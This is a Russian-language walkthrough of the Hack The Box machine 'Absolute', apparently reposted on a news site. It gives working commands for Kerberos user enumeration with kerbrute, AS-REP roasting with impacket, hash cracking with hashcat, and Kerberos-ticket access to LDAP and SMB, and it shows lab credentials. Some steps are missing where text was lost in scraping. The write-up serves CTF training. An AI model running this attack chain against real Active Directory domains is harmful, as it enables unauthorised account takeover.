Категория > Новости > HTB Absolute. Атакуем Active Directory с повышением привилегий через KrbRelay - «Новости»
HTB Absolute. Атакуем Active Directory с повышением привилегий через KrbRelay - «Новости»4-06-2023, 08:43. Автор: Richardson |
Hack The Box. Сложность прохождения оценена как «безумная». Тем интереснее оно будет! warningПодключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками. Разведка
Сканирование портовДобавляем IP-адрес машины в 10.10.11.181 absolute.htb И запускаем сканирование портов. Справка: сканирование портовСканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа. Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция Результат работы скрипта Сканер обнаружил много открытых портов, что типично для серверов с Windows:
Ни одна служба не позволила пройти аутентификацию от имени пользователя Главная страница сайта Точка входаНа сайте ничего интересного нет, но всегда стоит изучать метаданные всех приложенных файлов. На сайте нам доступны только картинки, берем любую из них (мне попалась под руку exiftool hero_5.jpg Метаданные изображения В поле автора явно имя пользователя! Скачиваем все доступные картинки и извлекаем оттуда имена. Интересно, что они все разные. exiftool hero_*.jpg | grep Author Полученные имена пользователей Так как на сервере активна служба Kerberos, мы можем перебрать имена пользователей. Kerberos имеет три разных варианта ответа в случае неверной аутентификации:
При этом для каждого пользователя у нас есть имя и фамилия, поэтому я накидал простой скрипт, чтобы сгенерировать все возможные варианты имен учетных записей из представленных пар. names = ["James Roberts", "Michael Chaffrey", "Donald Klay", "Sarah Osvald", "Jeffer Robinson", "Nicole Smith"] list = ["Administrator", "Guest"] for name in names: n1, n2 = name.split(' ') list.append(n1) list.append(n1+n2) list.append(n1+"."+n2) list.append(n1+n2[0]) list.append(n1+"."+n2[0]) list.append(n2[0]+n1) list.append(n2[0]+"."+n1) list.append(n2) list.append(n2+n1) list.append(n2+"."+n1) list.append(n2+n1[0]) list.append(n2+"."+n1[0]) list.append(n1[0]+n2) list.append(n1[0]+"."+n2) for n in list: print(n) А теперь выполняем перебор имен пользователей с помощью утилиты kerbrute. ./kerbrute_linux_amd64 userenum --dcabsolute.htb -dabsolute.htb test_users.txt Результат перебора Получаем список из семи существующих учетных записей. Я уже говорил, что есть вариант, при котором для учетной записи не требуется предварительная аутентификация. Давай просканируем наших пользователей с применением техники ASRep Roasting. Она позволяет получить пользовательский билет, из которого перебором можно извлечь пароль пользователя. Выполним данную атаку с помощью скрипта GetNPUsers из набора impacket. impacket-GetNPUsers absolute.htb/-no-pass -usersfileusers.txt Результат ASRep Roasting Чтобы перебрать хеш с помощью hashcat, нужно знать режим перебора. Его можно найти в справке hashcat. hashcat --example | grep 'krb5asrep' -A2 -B12 Справка hashcat Теперь указываем режим 18200 и перебираем полученный хеш. hashcat -a 0 -m18200 klay_hash.krb5asrep rockyou.txt Результат взлома хеша И получаем пароль пользователя D.Klay.
Продвижение
Пользователь svc_smbПроверим полученные учетные данные, попытавшись подключиться к службе SMB с помощью универсального средства CrackMapExec. crackmapexec smb 10.10.11.181 -uD.Klay -pDarkmoonsky248girl Результат подключения к службе SMB Ничего не вышло, так как не работает NTLM-аутентификация. Поэтому используем аутентификацию Kerberos, для чего выписываем тикет с помощью скрипта getTGT из набора impacket. Не забываем выставить одинаковое время на клиенте и сервере. Чтобы не делать это вручную, можно автоматически синхронизировать время с помощью sudo timedatectl set-ntp false sudo net time set -S10.10.11.181 impacket-getTGT 'absolute.htb/D.Klay@absolute.htb:Darkmoonsky248girl' Получение тикета пользователя D.Klay А теперь повторим подключение к SMB с аутентификацией Kerberos. export KRB5CCNAME=D.Klay@absolute.htb.ccache cme smb 10.10.11.181 -uD.Klay -dabsolute.htb -k --kdcHostdc.absolute.htb Результат подключения к службе SMB И снова неудача, хотя в ответе видим, что эта служба не прописана в билете. Пробуем подключиться к LDAP. cme ldap 10.10.11.181 -uD.Klay -dabsolute.htb -k --kdcHostdc.absolute.htb Результат подключения к службе SMB Подключение успешное, и мы можем работать с LDAP. Первым делом запрашиваем всех пользователей. Это можно сделать, указав флаг cme ldap 10.10.11.181 -uD.Klay -dabsolute.htb -k --kdcHostdc.absolute.htb --users Пользователи домена В описании пользователя impacket-getTGT 'absolute.htb/svc_smb@absolute.htb:AbsoluteSMBService123!' export KRB5CCNAME=svc_smb@absolute.htb.ccache impacket-smbclient svc_smb@dc.absolute.htb -k -no-pass shares Общие каталоги SMB Мы получили доступ к общему ресурсу домена.
Пользователь m.lovegodПерейти обратно к новости |